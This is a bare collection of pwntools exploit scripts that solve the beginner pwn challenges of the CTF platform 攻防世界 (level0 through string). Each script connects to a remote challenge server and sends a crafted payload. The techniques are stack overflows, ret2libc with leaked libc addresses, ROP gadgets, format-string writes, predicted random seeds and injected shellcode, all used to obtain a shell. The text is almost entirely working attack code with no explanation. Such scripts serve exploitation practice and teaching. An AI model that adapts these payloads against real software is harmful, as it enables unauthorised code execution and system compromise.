攻防世界
一、level0
思路1
from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',30689)
system_call=0x400596
payload='A'*0x80+'B'*0x8+p64(system_call)
r.recvuntil('\n')
r.sendline(payload)
r.interactive()
思路2
from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',45991)
pop_rdi=0x400663
system=0x400460
binsh=0x400684
payload='a'*0x80+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(system)
r.recvuntil('\n')
r.sendline(payload)
r.interactive()
二、level2
from pwn import *
r=remote('220.249.52.133',38928)
sys_addr=0x08048320
binsh_addr=0x0804A024
payload='A'*0x88+'B'*0x4+p32(sys_addr)+'bbbb'+p32(binsh_addr)
r.recvuntil(':')
r.sendline(payload)
r.interactive()
三、level3
写法1
from pwn import *
from LibcSearcher import *
context.log_level='debug'
r=remote('220.249.52.133',32619)
elf=ELF('./level3')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
payload1='a'*0x88+'bbbb'+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('\n')
r.sendline(payload1)
write_addr=u32(r.recv()[:4])
libc=LibcSearcher('write',write_addr)
base_addr=write_addr-libc.dump('write')
sys_addr=base_addr+libc.dump('system')
binsh=base_addr+libc.dump('str_bin_sh')
payload2='A'*0x88+'bbbb'+p32(sys_addr)+p32(0)+p32(binsh)
r.recvuntil('\n')
r.sendline(payload2)
r.interactive()
写法2
from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',58376)
elf=ELF('./level3')
libc=ELF('./libc32.so.6')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
payload1='a'*0x88+'bbbb'+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('\n')
r.sendline(payload1)
write_addr=u32(r.recv()[:4])
base_addr=write_addr-libc.sym['write']
sys_addr=base_addr+libc.sym['system']
binsh=base_addr+libc.search('/bin/sh').next()
payload2='A'*0x88+'bbbb'+p32(sys_addr)+p32(0)+p32(binsh)
r.recvuntil('\n')
r.sendline(payload2)
r.interactive()
四、when_did_you_born
from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',44288)
r.recvuntil('lets get helloworld for bof')
payload='A'*0x4+p64(1853186401)
r.sendline(payload)
r.interactive()
五、hello_pwn
from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',40669)
r.recvuntil('bof')
payload='A'*0x4+p64(1853186401)
r.sendline(payload)
r.interactive()
六、guess_num
from pwn import *
from ctypes import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
r=remote('220.249.52.133',37416)
payload='a'*0x20+p64(0)
r.recvuntil('name:')
r.sendline(payload)
libc=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(0)
for i in range(10):
r.recvuntil('number:')
r.sendline(str(libc.rand()%6+1))
r.recvuntil('Success')
r.recvuntil('flag!')
r.interactive()
七、CGfsb
from pwn import *
context.log_level='debug'
io=remote("111.198.29.45","49496")
payload=p32(0x0804A068)+"aaaa"+"%10$n"
io.sendlineafter("please tell me your name:","aaa")
io.sendlineafter("leave your message please",payload)
io.interactive()
八、getshell
远程运行获取flag
九、int_overflow
from pwn import *
io = remote("111.198.29.45", 47271)
cat_flag_addr = 0x0804868B
io.sendlineafter("Your choice:", "1")
io.sendlineafter("your username:", "Sakura")
io.recvuntil("your passwd:")
payload = "a" * 0x14 + "aaaa" + p32(cat_flag_addr)+"a"*234
io.sendline(payload)
io.recv()
io.interactive()
十、cgpwn2
from pwn import *
r=remote('111.198.29.45',46997)
sys_addr=0x08048420
binsh=0x0804A080
payload=0x2A*'a'+p32(sys_addr)+p32(0)+p32(binsh)
r.recvuntil('please tell me your name\n')
r.sendline('Sakura')
r.recvuntil('hello,you can leave some message here:\n')
r.sendline(payload)
r.interactive()
十一、string
from pwn import *
p = remote("111.198.29.45","49404")
context.log_level='debug'
p.recvuntil('secret[0] is')
v4_addr = int(p.recvuntil('\n')[:-1], 16)
p.sendlineafter("What should your character's name be:", 'Sakura')
p.sendlineafter("east or up?:", 'east')
p.sendlineafter("(0)?:", '1')
p.sendlineafter("'Give me an address'", str(int(v4_addr)))
p.sendlineafter("And, you wish is:", '%85c%7$n')
shellcode = asm(shellcraft.sh())
p.sendlineafter("SPELL", shellcode)
p.interactive()